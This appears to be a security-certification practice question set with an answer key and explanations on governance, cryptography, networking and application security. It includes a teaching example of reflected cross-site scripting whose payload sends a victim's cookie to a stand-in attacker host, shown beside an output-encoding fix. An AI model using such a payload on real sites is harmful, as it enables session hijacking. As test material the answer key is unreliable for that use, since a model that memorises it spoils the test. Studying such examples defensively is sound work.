viii. The mapping of risks to performance targets and budgets
ix. Key indicators to monitor the effectiveness of controls
A. ii, v, ix B. vi C. v D. vii, ix

B. The information risk management (IRM) policy should map to all of the items listed except specific physical controls. Policies should not specify any type of controls, whether they are administrative, physical, or technical.

Which of the following best describes "change control?" A. It is a systematic approach to deliberately regulating the changing nature of projects. B. It is the process of controlling the specific changes that take place during the life cycle of a system. C. It is an enterprise program for instituting programmatic changes in source code repositories. D. It is the process of controlling how changes to firewalls and other network devices are made.

B. The key words here are "specific changes" and "life cycle." Change control dictates that changes to a system over the course of its operation and maintenance (O&M) must be approved, documented, and tested according to a rigorous process. This is to ensure that such changes, whether they be mere alterations of configurations or sweeping code revisions, do not adversely impact either the system's capabilities or the security controls they implement or depend upon.

When classifying information, its sensitivity refers to: A. The magnitude of damage or loss an organization would sustain if the information was lost or made unavailable. B. The magnitude of damage or loss an organization would sustain if the information was revealed to unauthorized individuals. C. The ways in which an organization protects its information from third parties. D. The ways in which an organization protects its information from internal abuse.

B. The magnitude of damage or loss an organization would sustain if the information was revealed to unauthorized individuals.

All of the following are steps in the security audit process except A. Document the results. B. Convene a management review. C. Involve the right business unit leaders. D. Determine the scope.

B. The management review is not a part of any audit. Instead, this review typically uses the results of one or more audits in order to make strategic decisions.

During development, testing, and maintenance of the disaster recovery and continuity plan, a high degree of interaction and communication is crucial to the process. Why? A. This is a regulatory requirement of the process. B. The more people talk about it and get involved, the more awareness will increase. C. This is not crucial to the plan and should not be interactive because it will most likely affect operations. D. Management will more likely support it.

B. The more people talk about it and get involved, the more awareness will increase.

Frank is a new security manager for a large financial institution. He has been told that the organization needs to reduce the total cost of ownership for many components of the network and infrastructure. The organization currently maintains many distributed networks, software packages, and applications. Which of the following best describes the cloud services that are most likely provided by service providers for Frank to choose from? A. Infrastructure as a Service provides an environment similar to an operating system, Platform as a Service provides operating systems and other major processing platforms, and Software as a Service provides specific application-based functionality. B. Infrastructure as a Service provides an environment similar to a data center, Platform as a Service provides operating systems and other major processing platforms, and Software as a Service provides specific application-based functionality. C. Infrastructure as a Service provides an environment similar to a data center, Platform as a Service provides application-based functionality, and Software as a Service provides specific operating system functionality. D. Infrastructure as a Service provides an environment similar to a database, Platform as a Service provides operating systems and other major processing platforms, and Software as a Service provides specific application-based functionality.

B. The most common cloud service models are:
Infrastructure as a Service (IaaS): Cloud providers offer the infrastructure environment of a traditional data center in an on-demand delivery method.
Platform as a Service (PaaS): Cloud providers deliver a computing platform, which can include an operating system, database, and web server as a holistic execution environment.
Software as a Service (SaaS): Provider gives users access to specific application software (CRM, e-mail, games).

The BCP coordinator, working with management, should determine which of the following? A. The optimum point to discover the information system while balancing the cost of system inoperability against the cost of resources required for restoring the system and its overall support for critical mission/business functions. B. The optimum point to recover the information system while balancing the cost of system inoperability against the cost of resources required for restoring the system and its overall support for critical mission/business functions. C. The optimum point to recover the information system while balancing the cost of system inoperability against the value of resources required for restoring the system and its overall support for critical mission/business functions. D. The optimum point to recover the information system while balancing the cost of system inoperability against the cost of resources required for restoring the system and its overall support of critical mission/business costs.

B. The optimum point to recover the information system while balancing the cost of system inoperability against the cost of resources required for restoring the system and its overall support for critical mission/business functions.

John and his team are conducting a penetration test of a client's network. The team will conduct its testing armed only with knowledge it acquired from the Web. The network staff is aware that the testing will take place, but the penetration testing team will only work with publicly available data and some information from the client. What is the degree of the team's knowledge, and what type of test is the team carrying out? A. Full knowledge; blind test B. Partial knowledge; blind test C. Partial knowledge; double-blind test D. Zero knowledge; targeted test

B. The penetration testing team can have varying degrees of knowledge about the penetration target before the tests are actually carried out. These degrees of knowledge are zero knowledge, partial knowledge, and full knowledge. John and his team have partial knowledge; the team has some information about the target. Tests may also be blind, double-blind, or targeted. John's team is carrying out a blind test, meaning that the network staff knows that the test will take place.

ACME, Inc., paid a software vendor to develop specialized software, and that vendor has gone out of business. ACME, Inc., does not have access to the code and therefore cannot keep it updated. What mechanism should the company have implemented to prevent this from happening? A. Reciprocal agreement B. Software escrow C. Electronic vaulting D. Business interruption insurance

B. The protection mechanism that ACME, Inc., should have implemented is called software escrow. Software escrow means that a third party holds the source code and backups of the compiled code, manuals, and other supporting materials. A contract between the software vendor, customer, and third party outlines who can do what and when with the source code. This contract usually states that the customer can have access to the source code only if and when the vendor goes out of business, is unable to carry out stated responsibilities, or is in breach of the original contract. If any of these activities takes place, then the customer is protected because it can still gain access to the source code and other materials through the third-party escrow agent.

Which of the following is the best single sign-on technology for this situation? A. PKI B. Kerberos C. RADIUS D. TACACS+

B. The scenario specifies that PKI cannot be used, so the first option is not correct. Kerberos is based upon symmetric cryptography; thus, it does not need a PKI. RADIUS and TACACS+ are remote centralized access control protocols.

Who or what determines if an organization is going to operate under a discretionary, mandatory, or nondiscretionary access control model? A. Administrator B. Security policy C. Culture D. Security levels

B. The security policy sets the tone for the whole security program. It dictates the level of risk that management and the company are willing to accept. This in turn dictates the type of controls and mechanisms to put in place to ensure this level of risk is not exceeded.

What are the three major elements crucial to the security of software development environments? A. The software languages, the integrated development environments (IDEs), and the compilers B. The development platforms, the code repositories, and the software configurations C. The design teams, the development teams, and the testing teams D. The code repositories, the versioning systems, and the deployment processes

B. The security posture of development platforms, code repositories, and software configurations are the three overarching concerns for any software development environment. These determine the security of the entire life cycle of a development program, from how and where software is constructed, to how and where it is stored, through the state it is in as deployed.

When a system is said to be operating in "problem state" what does this mean? A. The system is using Rings 0 and 1. B. The system is executing an application. C. The system is in a fault state. D. The system is in a ready state.

B. The system is executing an application.

Claudia is the CISO for a global financial institution, overseeing the security of hundreds of millions of bank accounts. Which of the three main security principles should she consider most important when prioritizing the controls her enterprise should deploy? A. Confidentiality B. Integrity C. Availability D. Authenticity

B. The three main security principles for any and all security controls are availability, integrity, and confidentiality (AIC). Clearly each of these is a concern for Claudia's organization's security. However, among these, the integrity of the account data is foremost. Integrity is the assurance that the bank account data has not been altered in an unauthorized way. A compromise of this principle could essentially mean that the account holders' money has been stolen—that the bank has been robbed.

There are two main types of symmetric ciphers: stream and block. Which of the following is not an attribute of a good stream cipher? A. Statistically unbiased keystream B. Statistically predictable C. Long periods of no repeating patterns D. Keystream not linearly related to key

B. The two main types of symmetric algorithms are block ciphers and stream ciphers. A block cipher performs mathematical functions on blocks of bits at a time. A stream cipher, on the other hand, does not divide a message into blocks. Instead, a stream cipher treats the message as a stream of bits and performs mathematical functions on each bit individually. Good stream ciphers offer the following: unpredictable statistical results, long periods of no repeating patterns, a statistically unbiased keystream, and a keystream that is not linearly related to the key. If a stream cipher is statistically predictable, then it will be possible for an attacker to uncover the key and break the cipher.

Data backup verification efforts should A. Have the smallest scope possible B. Be based on the threats to the organization C. Maximize impact on business D. Focus on user data

B. The verification of data backups should focus on assessing the organization's ability to respond to the threats identified during the threat modeling and risk management processes. If the organization can't respond to these threats, then its backups may be useless.

What is the definition of an algorithm's work factor? A. The time it takes to encrypt and decrypt the same plaintext B. The time it takes to break the encryption C. The time it takes to implement 16 rounds of computation D. The time it takes to apply substitution functions

B. The work factor of a cryptosystem is the amount of time and resources necessary to break the cryptosystem or its encryption process. The goal is to make the work factor so high that an attacker could not be successful in breaking the algorithm or cryptosystem.

This graphic covers which of the following? A. Crossover error rate B. Identity verification C. Authorization rates D. Authentication error rates.

B. These steps are taken to convert the biometric input for identity verification:
i. A software application identifies specific points of data as match points.
ii. An algorithm is used to process the match points and translate that information into a numeric value.
iii. Authentication is approved or denied when the database value is compared with the end user input entered into the scanner.

Why are biometric systems considered more accurate than many of the other types of authentication technologies in use today? A. They are less accurate. B. They are harder to circumvent than other mechanisms. C. Biometric systems achieve high CER values. D. They have fewer Type I errors than Type II errors.

B. They are harder to circumvent than other mechanisms.

What is the most significant aspect of buffer overflow vulnerabilities? A. They are the result of coding errors that can easily occur in just about any software. B. They can commonly be successfully attacked remotely, resulting in malicious code executing within the same security context as the local process being compromised. C. They can exist in common code libraries, rendering many applications that depend on these libraries vulnerable as well. D. Good coding practices can make them far less common.

B. They can commonly be successfully attacked remotely, resulting in malicious code executing within the same security context as the local process being compromised.

Which of the following is a correct description of the pros and cons associated with third-generation programming languages? A. The use of heuristics reduced programming effort, but the amount of manual coding for a specific task is usually more than the preceding generation. B. The use of syntax similar to human language reduced development time, but the language is resource intensive. C. The use of binary was extremely time consuming but resulted in fewer errors. D. The use of symbols reduced programming time, but the language required knowledge of machine architecture.

B. Third-generation programming languages are easier to work with compared to earlier languages because their syntax is similar to human languages. This reduces program development time and allows for simplified and swift debugging. However, these languages can be very resource intensive when compared to the second-generation programming languages.

Tim recently started working at an organization with no defined security processes. One of the areas he'd like to improve is software patching. Consistent with the organizational culture, he is considering a decentralized or unmanaged model for patching. Which of the following is not one of the risks his organization would face with such a model? A. This model typically requires users to have admin credentials, which violates the principle of least privilege. B. It will be easier to ensure that all software is updated, since they will be configured to do so automatically. C. It may be difficult (or impossible) to attest to the status of every application in the organization. D. Having each application or service independently download the patches will lead to network congestion.

B. This option is not a risk, but a (probably unrealistic) benefit, so it cannot be the right answer. The other three options are all risks associated with an unmanaged patching model.

Miranda has been directed to investigate a possible violation of her organization's acceptable use policy (AUP) by a coworker suspected of running cryptocurrency mining software on his desktop system. Which of the following is NOT a very likely scenario that could arise during her investigation? A. During the course of her investigation, Miranda discovered that her coworker was also downloading and storing pornographic images, many of which appeared to involve minors. What began as an administrative investigation became a criminal one. B. Miranda was able to find evidence that appeared to corroborate the intentional use of illicit software to mine cryptocurrency using corporate resources (mainly CPU and power). As a result, Miranda's coworker was charged with a criminal violation of the Computer Fraud and Abuse Act (CFAA). C. As a result of Miranda's investigation, her coworker was terminated for violating the AUP. However, he hired an attorney and sued the company for wrongful dismissal based on knowledge that other employees were also running cryptocurrency mining software but went unpunished. Her administrative case became a civil one. D. Compelling evidence was found of a significant AUP violation, resulting in termination. However, during the subsequent wrongful dismissal suit (as described in option C), it was discovered that Miranda had not anticipated a court case, and so had not properly obtained or preserved the evidence. Consequently, the judge found summarily for the plaintiff, who got his job back along with compensatory damages.

B. Though it could be argued that the employee in question had exceeded his intended, authorized access to a company computer and used it to steal corporate resources (computing and electrical power), the severity of such actions is unlikely to rise to the level of a criminal indictment under the CFAA, particularly as a single instance.

Which of the following best describes the approach Frank has shown his team as outlined in the scenario? A. Attack surface analysis B. Threat modeling C. Penetration testing D. Double-blind penetration testing

B. Threat modeling is a systematic approach used to understand how different threats could be realized and how a successful compromise could take place. A threat model is a description of a set of security aspects that can help define a threat and a set of possible attacks to consider. It may be useful to define different threat models for one software product. Each model defines a narrow set of possible attacks to focus on. A threat model can help to assess the probability, the potential harm, and the priority of attacks, and thus help to minimize or eradicate the threats.

What is the definition of an algorithm's work factor? A. Time it takes to encrypt and decrypt the same plaintext. B. Time it takes to break encryption. C. Time it takes to implement 16 rounds of computation. D. Time it takes to apply substitution functions.

B. Time it takes to break encryption.

Mike, who was a help desk support person, has recently been moved into the position of security awareness trainer. What is the purpose of Mike's new position? A. To provide senior management with proof that they exercised due care and due diligence. B. To ensure that all employees are well versed on the company's security policy and program. C. To meet regulatory compliance. D. To oversee the training department and serve as quality control.

B. To ensure that all employees are well versed on the company's security policy and program.

Which of the following best describes Ethernet transmissions over a LAN? A. Traffic is sent to a gateway that sends it to the destination system. B. Traffic is bursty in nature and broadcasts data to all hosts on the subnet. C. Traffic streams and does not broadcast data. D. Traffic is contained within collision domains but not broadcast domains.

B. Traffic is bursty in nature and broadcasts data to all hosts on the subnet.

An online banking program may allow a customer to view his account balance, but may not allow the customer to transfer money until he has a certain security level or access right. What type of access control is being used? A. Timing. B. Transaction. C. Administrative. D. Physical.

B. Transaction.

Referring to the TCP/IP model, which layer's protocols are missing from the following list: SMTP, 802.11, and IPv6? A. Application. B. Transport C. Internet D. Data Link.

B. Transport

Which of the following is not part of user provisioning? A. Creation and deactivation of user accounts B. Business process implementation C. Maintenance and deactivation of user objects and attributes D. Delegating user administration

B. User provisioning refers to the creation, maintenance, and deactivation of user objects and attributes as they exist in one or more systems, directories, or applications, in response to business processes. User provisioning software may include one or more of the following components: change propagation, self-service workflow, consolidated user administration, delegated user administration, and federated change control. User objects may represent employees, contractors, vendors, partners, customers, or other recipients of a service. Services may include electronic mail, access to a database, access to a file server or mainframe, and so on.

Which of the following can take place if an attacker can insert tagging values into network- and switch-based protocols with the goal of manipulating traffic at the data link layer? A. Open relay manipulation B. VLAN hopping attack C. Hypervisor denial-of-service attack D. Smurf attack

B. VLAN hopping attacks allow attackers to gain access to traffic in various VLAN segments. An attacker can have a system act as though it is a switch. The system understands the tagging values being used in the network and the trunking protocols, and can insert itself between other VLAN devices and gain access to the traffic going back and forth. Attackers can also insert tagging values to manipulate the control of traffic at this data link layer.

Vulnerability scans normally involve all of the following except A. The identification of active hosts on the network B. The identification of malware on all hosts C. The identification of misconfigured settings D. The identification of operating systems

B. Vulnerability testing does not normally include scanning hosts for malware. Instead, it focuses on finding flaws that malware could potentially exploit.

Eve needs to decide upon a development method for a new project. Unbeknownst to her employer, she is an evil double agent working for their competitor, seeking to scuttle the effort. Which of the following methodologies should she select to best ensure her secret goal? A. Spiral. B. Waterfall. C. Agile. D. Prototyping.

B. Waterfall.

Hannah has been assigned the task of installing web access management (WAM) software. What is the best description for what WAM is commonly used for? A. Control external entities requesting access through X.500 databases B. Control external entities requesting access to internal objects C. Control internal entities requesting access through X.500 databases D. Control internal entities requesting access to external objects

B. Web access management (WAM) software controls what users can access when using a web browser to interact with web-based enterprise assets. This type of technology is continually becoming more robust and experiencing increased deployment because of the increased use of e-commerce, online banking, content providing, web services, and more. The basic components and activities in a web access control management process are as follows: 1. The user sends credentials to the web server. 2. The web server asks the WAM platform to authenticate the user; WAM authenticates against the LDAP directory and retrieves authorizations from the policy database. 3. The user requests access to a resource (object). 4. The web server verifies that object access is authorized and allows access to the requested resource.

Karen wants her team to develop software that allows her company to take advantage of and use many of the web services currently available by other companies. Which of the following best describes the components that need to be in place and what their roles are? A. Web service provides the application functionality. Universal Description, Discovery, and Integration describes the web service's specifications. The Web Services Description Language provides the mechanisms for web services to be posted and discovered. The Simple Object Access Protocol allows for the exchange of messages between a requester and provider of a web service. B. Web service provides the application functionality. The Web Services Description Language describes the web service's specifications. Universal Description, Discovery, and Integration provides the mechanisms for web services to be posted and discovered. The Simple Object Access Protocol allows for the exchange of messages between a requester and provider of a web service. C. Web service provides the application functionality. The Web Services Description Language describes the web service's specifications. The Simple Object Access Protocol provides the mechanisms for web services to be posted and discovered. Universal Description, Discovery, and Integration allows for the exchange of messages between a requester and provider of a web service. D. Web service provides the application functionality. The Simple Object Access Protocol describes the web service's specifications. Universal Description, Discovery, and Integration provides the mechanisms for web services to be posted and discovered. The Web Services Description Language allows for the exchange of messages between a requester and provider of a web service.

B. Web service provides the application functionality. WSDL describes the web service's specifications. UDDI provides the mechanisms for web services to be posted and discovered. SOAP allows for the exchange of messages between a requester and provider of a web service.

There are different ways of providing integrity and authentication within cryptography. What type of technology is shown in the graphic that follows? A. One-way hash B. Digital signature C. Birthday attack D. Collision

B. When a hash algorithm is applied to a message, it produces a message digest, and this value is signed with a private key to produce a digital signature. It provides authentication, data integrity, and nonrepudiation. The act of signing is the actual encryption of the value with the private key. When Maureen receives the message, she will perform the hashing function on the message and come up with her own hash value. Then she will decrypt the sent hash value (digital signature) with Kevin's public key. She then compares the two values, and if they are the same, she can be sure the message was not altered during transmission. She is also sure the message came from Kevin because the value was encrypted with his private key.

When is the emergency state actually over for a company? A. When all people are safe and accounted for. B. When all operations and people are moved back into the primary site. C. When operations are safely moved to the off-site facility. D. When a civil official declares that all is safe.

B. When all operations and people are moved back into the primary site.

Stephanie has been put in charge of developing incident response and forensics procedures her company needs to carry out if an incident occurs. She needs to ensure that their procedures map to the international principles for gathering and protecting digital evidence. She also needs to ensure that if and when internal forensics teams are deployed, they have labels, tags, evidence bags, cable ties, imaging software, and other associated tools. Which of the following best describes what Stephanie needs to build for the deployment teams? A. Local and remote imaging system B. Forensics field kit C. Chain of custody procedures and tools D. Digital evidence collection software

B. When forensics teams are deployed to investigate a potential crime, they should be properly equipped with all of the tools and supplies needed. The following are some of the common items in a forensics field kit: documentation tools (tags, labels, and timelined forms); disassembly and removal tools (antistatic bands, pliers, tweezers, screwdrivers, wire cutters, and so on); and package and transport supplies (antistatic bags, evidence bags and tape, cable ties, and others).

Mark is a security administrator who is responsible for purchasing new computer systems for a co-location facility his company is starting up. The company has several time-sensitive applications that require extensive processing capabilities. The co-location facility is not as large as the main facility, so it can only fit a smaller number of computers, which still must carry the same processing load as the systems in the main building. Which of the following best describes the most important aspects of the products Mark needs to purchase for these purposes? A. Systems must provide symmetric multiprocessing capabilities and virtualized environments. B. Systems must provide asymmetric multiprocessing capabilities and virtualized environments. C. Systems must provide multiprogramming multiprocessing capabilities and virtualized environments. D. Systems must provide multiprogramming multiprocessing capabilities and symmetric multiprocessing environments.

B. When systems provide asymmetric multiprocessing, this means multiple CPUs can be used for processing. Asymmetric indicates the capability of assigning specific applications to one CPU so that they do not have to share computing capabilities with other competing processes, which increases performance. Since a smaller number of computers can fit in the new location, virtualization should be deployed to allow for several different systems to share the same physical computer platforms.

While Disaster Recovery Planning (DRP) and Business Continuity Planning (BCP) are directed at the development of "plans," _____ is the holistic management process that should cover both of them. It provides a framework for integrating resilience with the capability for effective responses that protects the interests of the organization's key stakeholders. A. continuity of operations B. business continuity management C. risk management D. enterprise management architecture

B. While DRP and BCP are directed at the development of "plans," business continuity management (BCM) is the holistic management process that should cover both of them. BCM provides a framework for integrating resilience with the capability for effective responses in a manner that protects the interests of the organization's key stakeholders. The main objective of BCM is to allow the organization to continue to perform business operations under various conditions. BCM is the overarching approach to managing all aspects of BCP and DRP.

Mandy needs to calculate how many keys must be generated for the 260 employees using the company's PKI asymmetric algorithm. How many keys are required? A. 33,670 B. 520 C. 67,340 D. 260

B. With asymmetric algorithms, every user must have at least one pair of keys (private and public). In public key systems, each entity has different keys, or asymmetric keys. The two different asymmetric keys are mathematically related. If a message is encrypted by one key, the other key is required in order to decrypt the message. The formula for determining the number of keys needed in this environment is N × 2, which is the number of people (N) multiplied by the number of keys each person would need (2). In a public key system, the pair of keys is made up of one public key and one private key. The public key can be known to everyone, and the private key must be known and used only by the owner.

Why is the issue of data remanence sometimes problematic? A. Data retention policies don't usually specify when data should be deleted. B. With most file systems, deleting data doesn't ensure that it cannot be recovered. C. With most modern file systems, accidentally overwriting a small part of a file makes the remaining remnants unrecoverable. D. Physical destruction is the only way to ensure data cannot be recovered, and this is usually too prohibitively expensive.

B. With most file systems, deleting data doesn't ensure that it cannot be recovered.

Cross-site scripting (XSS) is an application security vulnerability usually found in web applications. What type of XSS vulnerability occurs when a victim is tricked into opening a URL programmed with a rogue script to steal sensitive information? A. Persistent XSS vulnerability B. Nonpersistent XSS vulnerability C. Second-order vulnerability D. DOM-based vulnerability

B. XSS attacks enable an attacker to inject malicious code into vulnerable web pages. When an unsuspecting user visits the affected page, the malicious code executes in the victim's browser and may lead to stolen cookies, hijacked sessions, malware execution, or bypassed access control, or may aid in exploiting browser vulnerabilities. There are three different XSS vulnerabilities: persistent, nonpersistent, and DOM-based. A nonpersistent vulnerability (also called a reflected vulnerability) occurs when an attacker tricks the victim into opening a URL programmed with a rogue script to steal the victim's sensitive information, such as a cookie or session ID. The principle behind this attack lies in exploiting the lack of proper input or output validation on dynamic websites. An XSS attack such as this can potentially cause damage on a huge scale. The stolen cookies can lead to compromised web mail systems, flooded blogs, and disclosed bank accounts. Many phishing campaigns exploit XSS vulnerabilities on otherwise trusted sites.
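The reflected case in working code, as an added example that is not part of the original study set: a minimal search-results renderer that echoes the `q` parameter back into the page. The site names, the parameter name and the attacker's URL are constructed for illustration. The vulnerable version reflects the raw value, so the browser would run the injected script; the hardened version applies output encoding so the same input can no longer open a tag.

```python
"""Reflected (nonpersistent) XSS: a request parameter is echoed into the page.

Added example, not from the study set. Hostnames, parameter names and the
attacker URL are constructed for illustration.
"""
import html
from urllib.parse import parse_qs, quote, urlparse

# Constructed attacker payload: ships the victim's cookie to the attacker.
PAYLOAD = "<script>document.location='https://evil.example/?c='+document.cookie</script>"

# Constructed link the victim is tricked into opening (payload percent-encoded).
MALICIOUS_URL = "https://bank.example/search?q=" + quote(PAYLOAD, safe="")


def query_param(url: str, name: str) -> str:
    """Return the first value of a query-string parameter, percent-decoded."""
    return parse_qs(urlparse(url).query).get(name, [""])[0]


def render_vulnerable(url: str) -> str:
    """Reflects the raw parameter into the HTML: the browser runs the script."""
    q = query_param(url, "q")
    return f"<h1>Results for {q}</h1>"


def render_hardened(url: str) -> str:
    """Output-encodes the parameter: '<' becomes '&lt;', so no tag can open."""
    q = query_param(url, "q")
    return f"<h1>Results for {html.escape(q, quote=True)}</h1>"


def contains_script_tag(page: str) -> bool:
    """Crude check used here to show whether the reflected value survived as markup."""
    return "<script>" in page.lower()


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(MALICIOUS_URL))
    print("hardened:  ", render_hardened(MALICIOUS_URL))
```

Output encoding at the point where untrusted data is written into HTML is the fix for this class; input filtering alone is not enough, because the same value may need to appear safely in different contexts (HTML body, attribute, JavaScript string), each with its own encoding.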

The OSI model specifies which layers, from top to bottom? A. application, transport, internet, network B. application, presentation, session, transport, network, data link, physical. C. network, internet, transport, application. D. physical, data link, network, transport, session, presentation, application.

B. application, presentation, session, transport, network, data link, physical.

Lacy's manager has tasked her with researching an intrusion detection system for a new dispatching center. Lacy identifies the top five products and compares their ratings. Which of the following is the evaluation criteria framework most in use today for these types of purposes? A. ITSEC B. Common Criteria C. Red Book D. Orange Book

B. Common Criteria

"Shoulder surfing" is an example of what kind of security failure? A. social engineering. B. confidentiality C. countermeasure D. Policy.

B. confidentiality

In which of the following system modes does the application manage the CPU's resources? A. Operative mode B. Cooperative mode C. Single-unit mode D. Program-specific mode

B. Cooperative mode

Which of the following are correct characteristics of Object Linking and Embedding Database (OLE DB)? i. It is a replacement for ODBC, extending its feature set to support a wider variety of nonrelational databases, such as object databases and spreadsheets that do not necessarily implement SQL. ii. A set of COM-based interfaces provides applications with uniform access to data stored in diverse data sources. iii. Because it is COM-based, OLE DB is limited to use by Microsoft Windows-based client tools. iv. It allows different applications to access different types and sources of data.

B. i, ii, iii, iv

Just about every company today has begun the practice of allowing corporate information to be accessed via the internet. While this is considered a step in the right direction for some business needs, it also creates security vulnerabilities. Which of the following solutions would be the best choice when setting up e-commerce within an organization? A. implementing a DMZ with dual-homed firewalls and two proxy servers. B. implementing a three-tiered application architecture. C. Using an isolated web server to store data. D. Implementing strict security policies on the devices holding the data.

B. implementing a three-tiered application architecture.

Which of the following is a component of an expert system that matches facts against patterns and determines which rules are acceptable? A. Knowledge base. B. inference machine. C. DCE. D. Automatic logical processing.

B. inference machine.

Input/output device management is important for what reason? A. Invoking deadlock situations. B. Ensuring the ready availability of resources. C. Creating virtual memory. D. Avoiding buffer overflows.

B. Ensuring the ready availability of resources.

Which of the following does IAB consider unethical behavior? A. internet users who conceal unauthorized accesses. B. internet users who waste computer resources. C. internet users who write viruses. D. internet users who monitor traffic.

B. internet users who waste computer resources.

How is virtual storage created? A. it is a combination of primary and secondary storage. B. it is a combination of RAM and secondary storage. C. it is a combination of real storage and secondary storage. D. it is a combination of RAM and EPROM memory.

B. it is a combination of RAM and secondary storage.

Karen and her security team have been tasked with developing a security policy to be presented to senior management for a new start-up organization. Of the factors listed below, which is the most important in determining an effective security policy? A. The cost/rate-of-return factor. B. It is consistent with the mission of the company. C. It reflects each person on the security team. D. It concentrates on the assets closest to the CEO's heart.

B. It is consistent with the mission of the company.

Why is computer-generated documentation usually considered unreliable evidence? A. It is primary evidence. B. It is too difficult to detect prior modifications. C. It is corroborative evidence. D. It is not covered under criminal law; it is covered under civil law.

B. It is too difficult to detect prior modifications.

Hiring new employees requires strict controls that must be constantly reviewed and audited. Which of the following controls would not be associated with personnel hiring? A. Background checks B. least Privilege C. Drug Screen D. NDA

B. least Privilege

What feature enables code to be executed without the usual security checks? A. ring 0 B. maintenance hook C. timing channel D. ready state.

B. maintenance hook

The purpose of initiating emergency procedures right after a disaster takes place is to prevent loss of life and injuries, and to _______________. A. secure the area to ensure that no looting or fraud takes place B. mitigate further damage C. protect evidence and clues D. investigate the extent of the damages

B. mitigate further damage

Which of the following incorrectly describes steganography? A. It is a type of security through obscurity. B. Modifying the most significant bit is the most common method used. C. Steganography does not draw attention to itself like encryption does. D. Media files are ideal for steganographic transmission because of their large size.

B. Modifying the most significant bit is the most common method used. The common technique modifies the least significant bit (LSB) of each sample, because that changes the carrier by at most one unit per sample and is not perceptible; an MSB change would alter the sample drastically and be obvious.

John has to create a team to carry out a business impact analysis and develop the company's business continuity plan. Which of the following should not be on the team? i. Business units. ii. Senior management. iii. IT department. iv. Security department. v. Communications department. vi. Legal department. A. v B. None of them. C. All of them. D. i

B. None of them.

Who has the primary responsibility of determining the classification level for information? A. senior management. B. owner. C. User. D. Functional Manager.

B. owner.

Kevin changes his e-mail header so that Kim thinks his message is coming from an IT administrator who is asking for her private account information. This attack could be characterized as all of the following except: A. spoofing B. passive C. Masquerading D. Social engineering.

B. passive

Which of the following is a role for users in data asset security? A. Deciding how to adhere to defined security controls. B. performing duties within their responsibility. C. Ensuring they have the necessary level of access to perform their duties. D. Ensuring their role is responsibly defined.

B. performing duties within their responsibility.

All of the following are examples of operational controls except: A. backup and recovery. B. policy development. C. media controls. D. proper destruction of data at the end of its lifetime.

B. policy development.

What is the primary purpose of using one-way encryption on user passwords? A. minimizes the amount of primary and secondary storage needed to store passwords. B. prevents anyone from reading passwords in plaintext. C. Avoids excessive processing required by an asymmetric algorithm. D. prevents replay attacks.

B. Prevents anyone from reading passwords in plaintext. A one-way (hash) function cannot be reversed, so the system stores and compares hashes rather than the passwords themselves; each password is salted before hashing so that identical passwords do not produce identical stored values.

Which of the following occurs in a pki environment? A. The RA creates the certificate, and the CA signs it. B. the CA signs the certificate. C. The RA signs the certificate. D. The user signs the certificate.

B. the CA signs the certificate.

In the modern era, are paper records still a significant concern in the protection of enterprise data assets? If so, why? If not, why not? A. Yes, because the most sensitive data is usually only stored in printed form. B. Yes, because printed copies are still commonly produced, are more difficult to track, and are commonly not disposed of properly. C. No, because the amount of sensitive data that is ever printed out is exceptionally small by comparison. D. No, because sensitive data that is printed out is the easiest to properly destroy.

B. Yes, because printed copies are still commonly produced, are more difficult to track, and are commonly not disposed of properly.

Which of the following incorrectly describes how routing commonly takes place on the Internet? A. EGP is used in the areas "between" each AS. B. Regions of nodes that share characteristics and behaviors are called ASs. C. CAs are specific nodes that are responsible for routing to nodes outside of their region. D. Each AS uses IGP to perform routing functionality.

C. A CA, or certificate authority, is a trusted third party that provides digital certificates for use in a public key infrastructure. CAs have nothing to do with routing. A PKI environment provides a hierarchical trust model but does not deal with routing of traffic.

Which of the following best describes why classless interdomain routing (CIDR) was created? A. To allow IPv6 traffic to tunnel through IPv4 networks B. To allow IPSec to be integrated into IPv4 traffic C. To allow an address class size to meet an organization's need D. To allow IPv6 to tunnel IPSec traffic

C. A Class B address range is usually too large for most companies, and a Class C address range is too small, so CIDR provides the flexibility to increase or decrease the class sizes as necessary. CIDR is the method to specify more flexible IP address classes.

Why has the frequency of successful brute-force attacks increased? A. The use of permutations and transpositions in algorithms has increased. B. As algorithms get stronger, they get less complex, and thus more susceptible to attacks. C. Processor speed and power have increased. D. Key length reduces over time.

C. A brute-force attack is resource intensive. It tries all values until the correct one is obtained. As computers have more powerful processors added to them, attackers can carry out more powerful brute-force attacks.

Tom works at a large retail company that recently deployed radio-frequency identification (RFID) to better manage its inventory processes. Employees use scanners to gather product-related information instead of manually looking up product data. Tom has found out that malicious customers have carried out attacks on the RFID technology to reduce the amount they pay on store items. Which of the following is the most likely reason for the existence of this type of vulnerability? A. The company's security team does not understand how to secure this type of technology. B. The cost of integrating security within RFID is cost-prohibitive. C. The technology has low processing capabilities and encryption is very processor intensive. D. RFID is a new and emerging technology, and the industry does not currently have ways to secure it.

C. A common security issue with RFID is that the data can be captured as it moves from the tag to the reader and modified. While encryption can be integrated as a countermeasure, it is not common because RFID is a technology that has low processing capabilities and encryption is very processor intensive.

Doors configured in fail-safe mode assume what position in the event of a power failure? A. Open and locked B. Closed and locked C. Closed and unlocked D. Open

C. A company must decide how to handle physical access control in the event of a power failure. In fail-safe mode, doorways are automatically unlocked. This is usually dictated by fire codes to ensure that people do not get stuck inside of a burning building. Fail-secure means that the door will default to lock.

Database views provide what type of security control? A. Detective B. Corrective C. Preventive D. Administrative

C. A database view is put into place to prevent certain users from viewing specific data. This is a preventive measure, because the administrator is preventing the users from seeing data not meant for them. This is one control to prevent inference attacks.

In cryptography, different steps and algorithms provide different types of security services. Which of the following provides only authentication, nonrepudiation, and integrity? A. Encryption algorithm B. Hash algorithm C. Digital signature D. Encryption paired with a digital signature

C. A digital signature is a hash value that has been encrypted with the sender's private key. The act of signing means encrypting the message's hash value with a private key. A message can be digitally signed, which provides authentication, nonrepudiation, and integrity. The hashing function ensures the integrity of the message, and the signing of the hash value provides authentication and nonrepudiation.

What is used to create a digital signature? A. The receiver's private key B. The sender's public key C. The sender's private key D. The receiver's public key

C. A digital signature is a message digest that has been encrypted with the sender's private key. A sender, or anyone else, should never have access to the receiver's private key.
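The sign-and-verify flow described in the digital-signature answers above (hash the message, sign the digest with the sender's private key, verify with the sender's public key), as an added example that is not part of the original study set. To stay dependency-free it uses a deliberately tiny textbook RSA keypair with hard-coded primes and no padding; that is insecure and exists only so the arithmetic is visible. Real systems use 2048-bit or larger keys with proper padding (PSS) through a vetted library. The key values and messages are constructed.

```python
"""Digital signature = hash of the message, signed with the sender's private key.

Added example, not from the study set. Toy textbook RSA (small hard-coded
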